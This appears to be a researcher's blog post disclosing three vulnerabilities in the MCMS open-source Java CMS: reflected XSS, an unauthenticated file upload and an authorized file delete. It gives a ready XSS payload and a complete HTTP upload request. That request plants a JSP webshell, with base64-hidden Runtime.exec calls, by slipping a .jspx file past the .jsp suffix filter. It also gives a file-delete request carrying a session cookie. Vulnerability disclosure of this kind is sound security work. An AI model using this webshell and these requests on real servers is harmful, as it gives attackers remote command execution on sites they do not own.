Lyc's Blog
0%

MCMS vulnerabilities

Posted on Edited on Disqus:

An open source CMS Project,https://github.com/ming-soft/MCMS

the MCMS vulnerabilities include

  • Reflect XSS
  • Unauthorized file upload
  • Authorized file delete

Reproduce

XSS

path /ms/template/unzip.do exist reflect xss

payload

1
/ms/template/unZip.do?fileUrl=%3C/p%3E%3Cimg%20src=x%20onerror=alert(%27hacking%27)%3E

Authorized file upload to RCE

Authorized file uploads exist

path /ms/file/uploadTemplate.do

need login get Cookie and upload file

Unauthorized file upload to RCE

path /file/upload

as above picture ,hacker can upload .jspx file to server without any identity verification , and even when project packaged war deploy in tomcat can get web shell from server.

the system filter suffix .jsp but still can use .jspx to bypass

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
POST /file/upload.do HTTP/1.1
Host: 192.168.100.103:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124088951720288539841514905041
Content-Length: 1393
Origin: http://192.168.100.103:8080
Connection: keep-alive

-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="uploadPath"

/
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="isRename"

false
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="appId"

false
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="file"; filename="shell.jspx"
Content-Type: image/png

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
    BASE64Decoder decoder = new BASE64Decoder();
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
    Process e = (Process)
            rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                    String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                    Object[]{}), request.getParameter("cmd") );
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>
-----------------------------124088951720288539841514905041--

source

net/mingsoft/basic/action/ManageFileAction.java

Authorized file delete

net/mingsoft/basic/action/TemplateAction.java

payload

1
2
3
4
5
6
7
8
9
10
11
12
GET /ms/template/unZip.do?fileUrl=HACKED HTTP/1.1
Host: 192.168.100.103:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://192.168.100.103:8080/ms/template/index.do?
Cookie: JSESSIONID=56EC9CCC14E1E8DEE4AACCF732EA7FC7; pageno_cookie=1